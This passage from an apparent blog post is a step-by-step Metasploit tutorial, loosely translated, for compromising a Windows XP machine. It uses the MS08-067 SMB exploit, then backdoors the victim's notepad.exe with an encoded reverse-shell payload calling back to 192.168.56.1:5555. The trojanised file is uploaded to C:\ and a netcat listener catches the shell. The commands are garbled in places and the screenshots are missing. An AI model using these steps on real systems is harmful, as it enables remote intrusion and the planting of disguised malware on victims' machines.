then type the following command:
# Search smb
In this case, I would use smb, the display will look like this
module would I use "exploit/windows/smb/ms08_067_netapi", and payload would I use "windows / meterpreter / reverse_tcp" display will look like the following
to fill in the IP of my RHOST victim (in this case Windows XP), then LHOST is the IP of the host (in this case Backtrack R3) the display will look like this
then type the following command
# exploit
display will look like the following
Now we have entered in the windows through windows system weaknesses, ie smb.
Then type the following command
# Download notepad.exe
look like the following
automatically downloaded files from the windows before going into "home",
after that open a new terminal, and go to the folder / opt/metasploit/msf3 / then type the following command
# msfpayload-l
display looks like the following
after that if you want to know more about its syntax syntax, use the command
# msfpayload-h
direct only, type the following command
# Msfpayload windows / shell_reverse_tcp LHOST = 192.168.56.1 LPORT = 5555 R | msfencode-t exe-x / root / notepad.exe-o / media / Eddy / DataBase / notepad.exe-e-c-k x86/shikata_ga_nai 5
look like the following
then we upload to the windows, through the first terminal,
to upload command, type the following command:
# Uploads / media / Eddy / DataBase / notepad.exe C: \
display will look like the following
after that window open windows to see if notepad.exe is already on C:
if you already have the display will look like this
then open a second terminal type the following command
# Nc-l-v-p 5555
windows and open windows, go on explore select C: notepad.exe in double click
notepad will open then back to terminal 2 on the backtrack to see what happens when we run straight into notepad.exe on Windows systems, because it is we inject notepad.exe and have been given payload.
Display looks like the following
ok good try, & good luck
0 comments:
Post a Comment